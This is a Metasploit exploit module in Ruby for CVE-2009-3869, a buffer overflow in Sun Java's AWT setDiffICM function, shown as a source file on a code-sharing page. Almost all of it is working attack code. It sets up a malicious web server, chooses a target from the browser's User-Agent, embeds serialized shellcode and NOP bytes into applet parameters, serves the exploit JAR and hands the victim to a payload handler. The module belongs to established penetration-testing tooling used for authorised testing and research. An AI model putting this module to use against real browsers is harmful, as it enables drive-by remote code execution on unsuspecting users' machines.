Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_setdifficm_bof.rb
31449 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a flaw in the setDiffICM function in the Sun JVM.

21


22
          The payload is serialized and passed to the applet via PARAM tags. It must be

23
          a native payload.

24


25
          The effected Java versions are JDK and JRE 6 Update 16 and earlier,

26
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and

27
          earlier, and SDK and JRE 1.3.1_26 and earlier.

28


29
          NOTE: Although all of the above versions are reportedly vulnerable, only

30
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

31
        },

32
        'License' => MSF_LICENSE,

33
        'Author' => [

34
          'jduck'

35
        ],

36
        'References' => [

37
          [ 'CVE', '2009-3869' ],

38
          [ 'OSVDB', '59710' ],

39
          [ 'BID', '36881' ],

40
          [ 'ZDI', '09-078' ]

41
        ],

42
        'Payload' => {

43
          'Space' => 1024,

44
          'BadChars' => '',

45
          'DisableNops' => true

46
        },

47
        'Targets' => [

48
=begin

49


50
No automatic targetting for now ...

51


52
          [ 'J2SE 1.6_16 Automatic',

53
            {

54
              'Platform' => %w{ linux osx win },

55
              'Arch' => [ARCH_X86, ARCH_PPC]

56
            }

57
          ],

58
=end

59
          [

60
            'J2SE 1.6_16 on Windows x86',

61
            {

62
              'Platform' => 'win',

63
              'Arch' => ARCH_X86

64
            }

65
          ],

66
          [

67
            'J2SE 1.6_16 on Mac OS X PPC',

68
            {

69
              'Platform' => 'osx',

70
              'Arch' => ARCH_PPC

71
            }

72
          ],

73
          [

74
            'J2SE 1.6_16 on Mac OS X x86',

75
            {

76
              'Platform' => 'osx',

77
              'Arch' => ARCH_X86

78
            }

79
          ],

80
        ],

81
        'DefaultTarget' => 0,

82
        'DisclosureDate' => '2009-11-04',

83
        'Notes' => {

84
          'Reliability' => UNKNOWN_RELIABILITY,

85
          'Stability' => UNKNOWN_STABILITY,

86
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

87
        }

88
      )

89
    )

90
  end

91


92
  def on_request_uri(cli, req)

93
    # Create a cached mapping between IP and detected target

94
    @targetcache ||= {}

95
    @targetcache[cli.peerhost] ||= {}

96
    @targetcache[cli.peerhost][:update] = Time.now.to_i

97


98
    if (target.name =~ /Automatic/)

99
      case req.headers['User-Agent']

100
      when /Windows/i

101
        print_status('Choosing a Windows target')

102
        @targetcache[cli.peerhost][:target] = targets[1]

103
      when /PPC Mac OS X/i

104
        print_status('Choosing a Mac OS X PPC target')

105
        @targetcache[cli.peerhost][:target] = targets[2]

106
      when /Intel Mac OS X/i

107
        print_status('Choosing a Mac OS X x86 target')

108
        @targetcache[cli.peerhost][:target] = targets[3]

109
      else

110
        print_status("Unknown target for: #{req.headers['User-Agent']}")

111
      end

112
    end

113


114
    # Clean the cache

115
    rmq = []

116
    @targetcache.each_key do |addr|

117
      if (Time.now.to_i > @targetcache[addr][:update] + 60)

118
        rmq.push addr

119
      end

120
    end

121


122
    rmq.each { |addr| @targetcache.delete(addr) }

123


124
    # Request processing

125
    if (!req.uri.match(/\.jar$/i))

126


127
      # Redirect to the base directory so the applet code loads...

128
      if (!req.uri.match(%r{/$}))

129
        print_status('Sending redirect so path ends with / ...')

130
        send_redirect(cli, get_resource + '/', '')

131
        return

132
      end

133


134
      # Display the applet loading HTML

135
      print_status('Sending HTML')

136
      send_response_html(cli, generate_html(payload.encoded),

137
                         {

138
                           'Content-Type' => 'text/html',

139
                           'Pragma' => 'no-cache'

140
                         })

141
      return

142
    end

143


144
    # Send the actual applet over

145
    print_status('Sending applet')

146
    send_response(cli, generate_applet(cli, req),

147
                  {

148
                    'Content-Type' => 'application/octet-stream',

149
                    'Pragma' => 'no-cache'

150
                  })

151


152
    # Handle the payload

153
    handler(cli)

154
  end

155


156
  def generate_html(pl)

157
    html = <<~EOF

158
      <html>

159
      <head>

160
      <!-- <meta http-equiv=refresh content=10 /> -->

161
      </head>

162
      <body>

163
      <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>

164
      <param name='sc' value='SCODE' />

165
      <param name='np' value='NOPS' />

166
      </applet>

167
      </body>

168
      </html>

169
    EOF

170
    # finalize html

171
    jar_name = rand_text_alphanumeric(32) + '.jar'

172
    html.gsub!(/JARNAME/, jar_name)

173


174
    # put payload into html

175
    debug_payload = false

176
    pload = ''

177
    pload << "\xcc" if debug_payload

178
    pload << pl

179
    if ((pload.length % 4) > 0)

180
      pload << rand_text((4 - (pload.length % 4)))

181
    end

182
    if debug_payload

183
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))

184
    end

185
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

186


187
    # put nops into html

188
    nops = "\x90\x90\x90\x90"

189
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))

190
    # print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

191


192
    return html

193
  end

194


195
  def exploit

196
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2009-3869.jar')

197
    fd = File.open(path, 'rb')

198
    @jar_data = fd.read(fd.stat.size)

199
    fd.close

200


201
    super

202
  end

203


204
  def generate_applet(cli, _req)

205
    if (target.name =~ /Automatic/)

206
      if (@targetcache[cli.peerhost][:target])

207
        @targetcache[cli.peerhost][:target]

208
      else

209
        return ''

210
      end

211
    else

212
      target

213
    end

214


215
    return @jar_data

216
  end

217
end

218


219